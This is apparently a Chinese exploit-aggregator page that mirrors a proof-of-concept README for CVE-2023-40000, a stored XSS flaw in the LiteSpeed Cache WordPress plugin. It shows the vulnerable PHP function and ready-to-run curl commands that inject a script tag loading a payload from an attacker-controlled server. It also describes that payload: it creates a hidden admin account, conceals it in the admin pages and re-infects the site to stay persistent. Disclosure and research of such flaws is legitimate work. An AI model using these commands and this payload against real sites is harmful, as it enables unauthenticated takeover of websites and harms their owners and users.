POC详情: aa7282ed0de99ab2950dc5221c00c6d45d077025

来源
https://github.com/quantiom/litespeed-cache-xss-poc
关联漏洞
标题: WordPress Plugin LiteSpeed Cache 跨站脚本漏洞 (CVE-2023-40000)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress Plugin LiteSpeed Cache 5.7 版本及之前版本存在跨站脚本漏洞,该漏洞源于存在跨站脚本漏洞。
描述
PoC for XSS vulnerability in the LiteSpeed Cache WordPress plugin (CVE-2023-40000) allowing elevated privileges. Includes code, explanations, and mitigations.
介绍
# LiteSpeed Cache XSS PoC

PoC for XSS vulnerability in the LiteSpeed Cache WordPress plugin allowing elevated privileges. This vulnerability was fixed in version **5.7.0.1** of the plugin, and was assigned [CVE-2023-40000](https://www.cve.org/CVERecord?id=CVE-2023-40000). According to [the plugin's advanced view page](https://wordpress.org/plugins/litespeed-cache/advanced/), about 35% of users are still using a vulnerable version (<5.7.0.1), which adds up to about 1.8M websites.

## Vulnerability Information

Due to lack of input sanitization in the `update_cdn_status` function, (unauthenticated) users are able to send a post request with an infected `_msg` form value that is stored and then displayed in the admin section of WordPress. This can allow anyone to create admin accounts, escalate their privileges, or steal sensitive information by just sending one unauthenticated POST request. The vulnerable function can be found [here](https://github.com/litespeedtech/lscache_wp/blob/v5.5/src/cdn-setup.cls.php#L49-L69) or below, and the `Admin_Display::error` function can be found [here](https://github.com/litespeedtech/lscache_wp/blob/2564cb05b6ba33fbf86fbcb62699dc5d3e28c9ae/src/admin-display.cls.php#L376-L385).

```php
/**
 * Callback for updating Auto CDN Setup status after run
 *
 * @since  4.7
 * @access public
 */
public function update_cdn_status() {

	if ( !isset( $_POST[ 'success' ] ) || !isset( $_POST[ 'result' ] ) ) {
		self::save_summary( array( 'cdn_setup_err' => __( 'Received invalid message from the cloud server. Please submit a ticket.', 'litespeed-cache' ) ) );
		return self::err( 'lack_of_param' );
	}
	if (!$_POST[ 'success' ]) {
		self::save_summary( array( 'cdn_setup_err' => $_POST[ 'result' ][ '_msg' ] ) );
		Admin_Display::error( __( 'There was an error during CDN setup: ', 'litespeed-cache' ) . $_POST[ 'result' ][ '_msg' ] );
	} else {
		$this->_process_cdn_status($_POST[ 'result' ]);
	}

	return self::ok();
}
```

## Proof of Concept

The proof of concept in this repository contains a NodeJS express server designed to obfuscate and deliver the XSS payload, while also capturing incoming pings and data. The payload script showcases the potential actions of attackers exploiting this vulnerability: it creates an admin account with the username "wp-config-user" and password "somepassword123". The XSS payload, which is also disguised as `admin-bar-reloaded.min`, hides the initial XSS popup on load, completely hides the created user in the `users.php` admin page, and repeats the initial POST request to maintain a persistent stored XSS.

### Installation and Usage

1. Install Node.js and npm if they are not already installed.
2. Clone the repository and navigate into the project directory.
3. Run `npm install` to install the dependencies.
4. Start the server with `node index.js`.

### Sending the POST Request

Use the following cURL command to send the POST request to the vulnerable endpoint:

#### Linux:

```bash
curl -X POST "https://target.website/wordpress/wp-json/litespeed/v1/cdn_status" \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "success=0&result[_msg]=<script src=https://your.server/admin-bar-reloaded.min.js></script>"

```

#### Windows:

```cmd
curl -X POST "https://target.website/wordpress/wp-json/litespeed/v1/cdn_status" ^
-H "Content-Type: application/x-www-form-urlencoded" ^
-d "success=0&result[_msg]=<script src=https://your.server/admin-bar-reloaded.min.js></script>"
```

## Disclaimer

The contents of this repository are provided strictly for educational and research purposes. I am not responsible for any misuse or illegal activities stemming from the use of this proof of concept. On top of this, a warning has been issued on the LiteSpeed Cache plugin page advising all users to update their software due to this known vulnerability. Please ensure your installations are updated to version 5.7.0.1 or later to mitigate this issue.
文件快照

 [4.0K]  /data/pocs/aa7282ed0de99ab2950dc5221c00c6d45d077025
├── [2.6K]  index.js
├── [1.0K]  LICENSE
├── [ 338]  package.json
├── [ 53K]  package-lock.json
├── [3.8K]  payload.js
└── [3.9K]  README.md

0 directories, 6 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。